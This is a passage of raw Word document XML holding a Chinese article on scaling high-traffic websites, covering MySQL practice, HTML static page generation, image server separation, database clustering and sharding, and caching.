        <w:t>1、禁用全部auto_increment的字段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004102B4" w:rsidRDefault="004102B4" w:rsidP="004102B4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>2、id需要采用通用的算法集中分配</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004102B4" w:rsidRDefault="004102B4" w:rsidP="004102B4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>3、要具有比较好的方法来监控mysql主机的负载和服务的运行状态。如果你有30台以上的mysql数据库在跑就明白我的意思了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004102B4" w:rsidRDefault="004102B4" w:rsidP="004102B4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>4、不要使用持久性链接（不要用pconnect）,相反，使用sqlrelay这种第三方的数据库链接池，或者干脆自己做，因为php4中mysql的链接池经常出问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004102B4" w:rsidRDefault="004102B4" w:rsidP="004102B4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="E53333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>二：高并发高负载网站的系统架构之HTML静态化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004102B4" w:rsidRDefault="004102B4" w:rsidP="004102B4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>    其实大家都知道，效率最高、消耗最小的就是纯</w:t>
      </w:r>
      <w:hyperlink r:id="rId226" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
          </w:rPr>
          <w:t>静态化</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>的html页面，所以我们尽可能使我们的网站上的页面采用静态页面来实现，这个最简单的方法其实也是 最有效的方法。但是对于大量内容并且频繁更新的网站，我们无法全部手动去挨个实现，于是出现了我们常见的信息发布系统CMS，像我们常访问的各个门户站点 的新闻频道，甚至他们的其他频道，都是通过信息发布系统来管理和实现的，信息发布系统可以实现最简单的信息录入自动生成静态页面，还能具备频道管理、权限 管</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>理、自动抓取等功能，对于一个大型网站来说，拥有一套高效、可管理的CMS是必不可少的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">　　除了门户和信息发布类型的网站，对于交互性要求很高的社区类型网站来说，尽可能的静态化也是提高性能的必要手段，将社区内的帖子、文章进行实时的静态化，有更新的时候再重新静态化也是大量使用的策略，像Mop的大杂烩就是使用了这样的策略，网易社区等也是如此。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>    同时，html静态化也是某些缓存策略使用的手段，对于系统中频繁使用数据库查询但是内容更新很小的应用，可以考虑使用html静态化来实现，比如论坛 中论坛的公用设置信息，这些信息目前的主流论坛都可以进行后台管理并且存储再数据库中，这些信息其实大量被前台程序调用，但是更新频率很小，可以考虑将这 部分内容进行后台更新的时候进行静态化，这样避免了大量的数据库访问请求高并发。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004102B4" w:rsidRDefault="004102B4" w:rsidP="004102B4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>网站HTML静态化解决方案</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004102B4" w:rsidRDefault="004102B4" w:rsidP="004102B4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>当一个Servlet资源请求到达WEB服务器之后我们会填充指定的JSP页面来响应请求:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004102B4" w:rsidRDefault="004102B4" w:rsidP="004102B4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>HTTP请求---Web服务器---Servlet--业务逻辑处理--访问数据--填充JSP--响应请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004102B4" w:rsidRDefault="004102B4" w:rsidP="004102B4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>HTML静态化之后:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004102B4" w:rsidRDefault="004102B4" w:rsidP="004102B4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>HTTP请求---Web服务器---Servlet--HTML--响应请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004102B4" w:rsidRDefault="004102B4" w:rsidP="004102B4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>静态访求如下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004102B4" w:rsidRPr="00BB0C5D" w:rsidRDefault="007A5178" w:rsidP="00BB0C5D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="E53333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>四：高并发高负载网站的系统架构之图片服务器分离</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E53333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>大家知道，对于</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>服务器来说，不管是</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>还是其他容器，图片是最消耗资源的，于是我们有必要将图片与页面进行分离，这是基本上大型网站都会采用的策略，他</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>们都有独立的图片服务器，甚至很多台图片服务器。这样的架构可以降低提供页面访问请求的服务器系统压力，并且可以保证系统不会因为图片问题而崩溃，在应用</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>服务器和图片服务器上，可以进行不同的配置优化，比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>apache</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在配置</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ContentType</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的时候可以尽量少支持，尽可能少的</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>LoadModule</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB0C5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>保证更高的系统消耗和执行效率。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D6407" w:rsidRDefault="004D6407" w:rsidP="004102B4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D6407" w:rsidRDefault="004D6407" w:rsidP="004102B4">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004D6407" w:rsidRDefault="004D6407" w:rsidP="004D6407">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="E53333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>五：高并发高负载网站的系统架构之数据库集群和库表散列</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D6407" w:rsidRDefault="004D6407" w:rsidP="004D6407">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>    大型网站都有复杂的应用，这些应用必须使用数据库，那么在面对大量访问的时候，数据库的瓶颈很快就能显现出来，这时一台数据库将很快无法满足应用，于是我们需要使用数据库集群或者库表散列。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">　　在数据库集群方面，很多数据库都有自己的解决方案，Oracle、Sybase等都有很好的方案，常用的MySQL提供的Master/Slave也是类似的方案，您使用了什么样的DB，就参考相应的解决方案来实施即可。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>    上面提到的数据库集群由于在架构、成本、扩张性方面都会受到所采用DB类型的限制，于是我们需要从应用程序的角度来考虑改善系统架构，库表散列是常用并 且最有效的解决方案。我们在应用程序中安装业务和应用或者功能模块将数据库进行分离，不同的模块对应不同的数据库或者表，再按照一定的策略对某个页面或者 功能进行更小的数据库散列，比如用户表，按照用户ID进行表散列，这样就能够低成本的提升系统的性能并且有很好的扩展性。sohu的论坛就是采用了这样的 架构，将论坛的用户、设置、帖子等信息进行数据库分离，然后对帖子、用户按照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>板块和ID进行散列数据库和表，最终可以在配置文件中进行简单的配置便能让系 统随时增加一台低成本的数据库进来补充系统性能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00215FF4" w:rsidRDefault="00215FF4" w:rsidP="00215FF4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="E53333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>六：高并发高负载网站的系统架构之缓存</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00215FF4" w:rsidRDefault="00215FF4" w:rsidP="00215FF4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>    缓存一词搞技术的都接触过，很多地方用到缓存。网站架构和网站开发中的缓存也是非常重要。这里先讲述最基本的两种缓存。高级和分布式的缓存在后面讲述。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">　　架构方面的缓存，对Apache比较熟悉的人都能知道Apache提供了自己的缓存模块，也可以使用外加的Squid模块进行缓存，这两种方式均可以有效的提高Apache的访问响应能力。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>    网站程序开发方面的缓存，Linux上提供的Memory Cache是常用的缓存接口，可以在web开发中使用，比如用Java开发的时候就可以调用MemoryCache对一些数据进行缓存和通讯共享，一些大 型社区使用了这样的架构。另外，在使用web语言开发的时候，各种语言基本都有自己的缓存模块和方法，PHP有Pear的Cache模块，Java就更多了，.net不是很熟悉，相信也肯定有。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00215FF4" w:rsidRDefault="00215FF4" w:rsidP="00215FF4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Java开源缓存框架</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
